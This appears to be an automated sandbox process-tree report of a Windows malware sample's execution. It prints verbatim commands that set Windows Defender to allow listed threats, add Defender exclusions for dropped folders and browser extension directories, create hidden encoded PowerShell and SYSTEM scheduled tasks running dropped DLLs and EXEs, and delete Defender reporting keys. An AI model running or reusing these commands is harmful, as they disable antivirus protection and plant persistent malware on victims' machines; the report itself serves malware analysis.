C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1576
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3888
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XfLIShEvOXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XfLIShEvOXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNpaxMIFBfOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNpaxMIFBfOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rXjduNqsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rXjduNqsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sExqNpidIxpuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sExqNpidIxpuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mIZkPWOoOJyyBkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mIZkPWOoOJyyBkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tZRuTBnWsrIvjiMS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tZRuTBnWsrIvjiMS\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:323⤵PID:4500
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:324⤵PID:2172
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:643⤵PID:4076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:323⤵PID:2992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:643⤵PID:3408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:323⤵PID:3372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:643⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:323⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:643⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:323⤵PID:3316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:643⤵PID:3164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mIZkPWOoOJyyBkVB /t REG_DWORD /d 0 /reg:323⤵PID:3992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mIZkPWOoOJyyBkVB /t REG_DWORD /d 0 /reg:643⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky /t REG_DWORD /d 0 /reg:323⤵PID:324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky /t REG_DWORD /d 0 /reg:643⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tZRuTBnWsrIvjiMS /t REG_DWORD /d 0 /reg:323⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tZRuTBnWsrIvjiMS /t REG_DWORD /d 0 /reg:643⤵PID:4536
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDFFhKYZe" /SC once /ST 05:44:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDFFhKYZe"2⤵PID:2768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDFFhKYZe"2⤵PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GVFFxSkoOBQmaesjx" /SC once /ST 17:09:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\AXbMdvm.exe\" Xs /jSsite_idnnp 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GVFFxSkoOBQmaesjx"2⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3356
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4924
-
C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\AXbMdvm.exeC:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\AXbMdvm.exe Xs /jSsite_idnnp 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3840 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbPqNtaaeFeEtSKaKR"2⤵PID:4016
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3592
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2476
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rXjduNqsU\JwFQvq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydgLTpiJkJvZaMG" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydgLTpiJkJvZaMG2" /F /xml "C:\Program Files (x86)\rXjduNqsU\AUNgGgx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydgLTpiJkJvZaMG"2⤵PID:3768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydgLTpiJkJvZaMG"2⤵PID:492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KnGwbHArRBeaeV" /F /xml "C:\Program Files (x86)\bNpaxMIFBfOU2\oQWqHpD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PYfufpvJvopmW2" /F /xml "C:\ProgramData\mIZkPWOoOJyyBkVB\bxsoMYs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PjCRMuBebEpnyGhYW2" /F /xml "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\IBRSLAM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pnSNJxEXsCJvVRidMKW2" /F /xml "C:\Program Files (x86)\sExqNpidIxpuC\vMdCTDz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jFAecgscnrJhBwrRF" /SC once /ST 08:45:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tZRuTBnWsrIvjiMS\DCpuRApo\GHpKiHR.dll\",#1 /ALsite_idGph 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jFAecgscnrJhBwrRF"2⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4736
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3608
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4496
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GVFFxSkoOBQmaesjx"2⤵PID:4828
-
-
